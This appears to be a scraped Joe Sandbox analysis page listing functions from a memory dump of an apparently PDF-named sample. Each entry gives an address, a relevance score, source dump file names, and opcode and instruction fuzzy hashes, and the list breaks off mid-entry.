Function 00007FF7D7875A30 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf82ba6c6fdc68a08e31c334596b4cb8a8ae331943e9d76ee580bf5910e891c4
Instruction ID: 21b9917d1b71f9204c67732f622c460a9072df80dee3d32954c6679594066c06
Opcode Fuzzy Hash: bf82ba6c6fdc68a08e31c334596b4cb8a8ae331943e9d76ee580bf5910e891c4
Instruction Fuzzy Hash: 415241A271579681EF659B19C04436CABA0FF55BA4FD85236CEAE0B3D0DF68D4E2C310

Function 00007FF7D7885B10 Relevance: .6, Instructions: 619COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee10059f61773a96bf7f029e2f956a0a11c431d264a55ed9702e6675bb72265
Instruction ID: b8342631f171581df58d00ee57a950111334987d484ea3a8588b5d66c6beee2b
Opcode Fuzzy Hash: bee10059f61773a96bf7f029e2f956a0a11c431d264a55ed9702e6675bb72265
Instruction Fuzzy Hash: E7429F32B08B4686EB109F65E44016DBBA1FB44BD8FC40136DE8E57B99DF3CE4628720

Function 00007FF7D7886450 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7a1d3612d0a814a1dee86935114e34dc2039f1a0b9a4dd66838f11f37eb379
Instruction ID: 6c9d3affa869b34e19967b4df74ce56a6712b1d16c612fc7d370805baf6712a1
Opcode Fuzzy Hash: 5f7a1d3612d0a814a1dee86935114e34dc2039f1a0b9a4dd66838f11f37eb379
Instruction Fuzzy Hash: B442B472F0974586EB10DF65E5005BCABA2FB44B98BC44537CE0E6B785DE38E466C360

Function 00007FF7D7870B90 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa5471e79c0c63fd06b51ccd23458f599ae93de05a4b112e9e72a9cfb8e0722
Instruction ID: e7ec1f67e81357371f1f2510935d24d5fe126e296a5525f285907b5a0a175e1a
Opcode Fuzzy Hash: 1aa5471e79c0c63fd06b51ccd23458f599ae93de05a4b112e9e72a9cfb8e0722
Instruction Fuzzy Hash: B602A372B1468586EA14DF59D444B7CBB90AB81BA4FD44333CAAE4B7D1CE3CE492C720

Function 00007FF7D78705E4 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-0
Opcode ID: 1d33352506d418f965e2be0ee4e83ade00b9e904bc574517287f8d4e995c9839
Instruction ID: ed8d033472d217c8f18bcb28ecf394d60b3a293619b210cf119e969a2e260c7f
Opcode Fuzzy Hash: 1d33352506d418f965e2be0ee4e83ade00b9e904bc574517287f8d4e995c9839
Instruction Fuzzy Hash: 72029521A19B8645FA55EB28D45073CABA0BF84758FD44237D98E5B3A0DF3DE4D3C260

Function 00007FF7D787AC50 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b7fa00c5141db918a13d26ef04f624c159433362168469644014459f3fc6248
Instruction ID: 5c9f4c5ca138c093d8b164f693b50284077d81857326507f5e79a98e5c2c16a7
Opcode Fuzzy Hash: 4b7fa00c5141db918a13d26ef04f624c159433362168469644014459f3fc6248
Instruction Fuzzy Hash: A8C18A72A18A4681EA54AB0DD454A3CBB95FB857A0FC44237D9AE4B7D0DF3CE493C321

Function 00007FF7D7867280 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a8931bfe241f46fc4a4f5bf01bdb899dd294108fa49bad6621c2a140b2efcd
Instruction ID: eea585305fd9df4c934feca4378488b5853b9bfdbd207f18a7e0f69967026478
Opcode Fuzzy Hash: 98a8931bfe241f46fc4a4f5bf01bdb899dd294108fa49bad6621c2a140b2efcd
Instruction Fuzzy Hash: 39C19232E09A8692E654EB18E54477EBBA1FB84748FC44137CA8D4B351DF7CE0A28760

Function 00007FF7D7907680 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f0689af4de86c52efbf030752e97357ae862d0d8ba86f47db809d53dccdfdf
Instruction ID: 742a32cce5832c19a286cab2450d297be732aed16c68cb5d3ca2b2f68f0c31a7
Opcode Fuzzy Hash: f5f0689af4de86c52efbf030752e97357ae862d0d8ba86f47db809d53dccdfdf
Instruction Fuzzy Hash: 75A1942391D25385EB55AB11A40477EE7A0EB80BAAFD04032FE8D16794EF7CD493DB20

Function 00007FF7D7884790 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c84786c8e63720a20252efe6f149bd71f1858b8f21e9f28273499fda469822
Instruction ID: 66ad23a881d84ac1942b44bfdd7e41266620feaaab757c19aeffa67dc638606c
Opcode Fuzzy Hash: f9c84786c8e63720a20252efe6f149bd71f1858b8f21e9f28273499fda469822
Instruction Fuzzy Hash: DAC1AA72A18A4681EA14EF49E85093CF795FB887A4BC44237D9AD4B790DF3DE463C324

Function 00007FF7D78B2140 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfaf024265d535862ca46e89c72d1e3a6d0e365616d5a145e73131bc64428a7
Instruction ID: ca25cc1f2e082dde842c4b0bc8a0916116b63788d78997c81530795d6fbf3819
Opcode Fuzzy Hash: 6bfaf024265d535862ca46e89c72d1e3a6d0e365616d5a145e73131bc64428a7
Instruction Fuzzy Hash: 1DA14D72B08E4285E764AF25E4956ADFFA0BB44784FD04133CD8E477A4DE7CA0568B60

Function 00007FF7D785B0B0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f6d5e490fbb126a6ff7b1701bbe82b2d86a503b07016c15d5eb3855ba6564f
Instruction ID: 1d799605d7b28c057b820e31290212bf020eff07769ce2f9ba64ef3287c9a49d
Opcode Fuzzy Hash: 52f6d5e490fbb126a6ff7b1701bbe82b2d86a503b07016c15d5eb3855ba6564f
Instruction Fuzzy Hash: CE81F7B3B14A4587EB09DF29C4907AD7BA5E758B84FC48036CA0D47B94DF38D662CB60

Function 00007FF7D78E7B00 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201d14e544d99d6638a08df241633db7cba70c4c9db3b086c09447a2057dcaae
Instruction ID: 41231c60f30e1183f48098e61fe88c1893b1b1ba1207d6954214c63d0cd951a2
Opcode Fuzzy Hash: 201d14e544d99d6638a08df241633db7cba70c4c9db3b086c09447a2057dcaae
Instruction Fuzzy Hash: 8A513A11E186855AEA64BA229C4167DEAA4BF68790FD46532FE1D03781DF3EDCA38310

Function 00007FF7D7858BC4 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f86d7bf020a1616741af4184dcfb5ba4b8671fe15046aec6e24d3f199e6ae6
Instruction ID: 3faa2fc0e92033ab7abd144850b7dee61b2f03ca835c334f437654c4018ca106
Opcode Fuzzy Hash: 09f86d7bf020a1616741af4184dcfb5ba4b8671fe15046aec6e24d3f199e6ae6
Instruction Fuzzy Hash: 9061C2B7B11B5687DB089F28C45566D7AA2FB94B88BD58137CA0D43788DF3CD922C780

Function 00007FF7D787B080 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d57fc53a0bc7be20116aca23209ae0406205f32a239ba4272a93e64b9b3f44
Instruction ID: 27cfa96f71c1657c39a626071abf1066e313ee6939ed8e4df85e3872ea322692
Opcode Fuzzy Hash: a2d57fc53a0bc7be20116aca23209ae0406205f32a239ba4272a93e64b9b3f44
Instruction Fuzzy Hash: B951BB11B2A74D01E906967A510167D8D536F9A7C0FDCCB33D98F3B690EF2DB8E28220

Function 00007FF7D7964740 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f9807a77ec1231628a5fee68b55ea91a59b695855e809c40b27073d2b7f48a
Instruction ID: 7a2ec906c615c7b3a5dc912857ff6ca2f3648d80d5051381af4789a3f9c8c556
Opcode Fuzzy Hash: 24f9807a77ec1231628a5fee68b55ea91a59b695855e809c40b27073d2b7f48a
Instruction Fuzzy Hash: 8A512C53A3C1B383D7389B18A402F3EE291EB91B45FC0D336E59E05EA5E72DD2529B10

Function 00007FF7D7967580 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce8c6d3ee3c0effbfb5e5070d462e26ff74d891885af259ccabdff087d0bfa8d
Instruction ID: 01ae63111dd971ad37e9dae1399c4069c2aab2a84c97b18288b10e69ebc1c734
Opcode Fuzzy Hash: ce8c6d3ee3c0effbfb5e5070d462e26ff74d891885af259ccabdff087d0bfa8d
Instruction Fuzzy Hash: 3651F722A05A8599E714EF26E8455BDF7A0BF58788FD88136FE4D83B44DF38D552C310

Function 00007FF7D79672A0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791768f092ae9c95c6646ad35f9f61e61f19431362016a0e294cff50b4526375
Instruction ID: 92b9d8e3eeeb20613ee2e0fec1ac2a4c7d9dbcd162e0de2433f4cabfb23ee9a8
Opcode Fuzzy Hash: 791768f092ae9c95c6646ad35f9f61e61f19431362016a0e294cff50b4526375
Instruction Fuzzy Hash: 31314822E185C645EA28BB2688461FCE731AF99744FE89132FE1D43B42DE1CE8538720

Function 00007FF7D7904BA0 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecad0f5e69bfcb9353b2f291865ecf9042bc23a9cb87116465dfe04c430f0d0a
Instruction ID: 958b71bc568aab4d4a95fe108c2ab11a0ba2556f8b8755d729f91af56d635615
Opcode Fuzzy Hash: ecad0f5e69bfcb9353b2f291865ecf9042bc23a9cb87116465dfe04c430f0d0a
Instruction Fuzzy Hash: 9441E123A14A929AE720EB35D8417BDB3B1AB85758FD48232DE0D52795DF38E893C710

Function 00007FF7D791B9B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d14386800f113bec717bbd88111bac7a7530a10303c90b72c11725b005c1b08
Instruction ID: ba686e874d16320a8a8ec46d5f13bc5d480b0fb2fb36853c41499a74f7366156
Opcode Fuzzy Hash: 5d14386800f113bec717bbd88111bac7a7530a10303c90b72c11725b005c1b08
Instruction Fuzzy Hash: DB41AC33B04BA489E715CBB5E8406DD77B5BB58348FA5812AEE8DA7A08DF34C592C700

Function 00007FF7D78E2E20 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15dfadb1a74e4f6d8540bab6bfec0cbbcfde4232f9d2668ea604c55701d213ec
Instruction ID: 64fd0c65afc1e2cbfdee9b2bb47666e27e7dfe1a1484c146242b23d682a7a301
Opcode Fuzzy Hash: 15dfadb1a74e4f6d8540bab6bfec0cbbcfde4232f9d2668ea604c55701d213ec
Instruction Fuzzy Hash: 9F21ED94E1844794E918BF2998A60FDE6321F5E780FD82433E82D5B7A3ED1CE4278374

Function 00007FF7D796FA10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

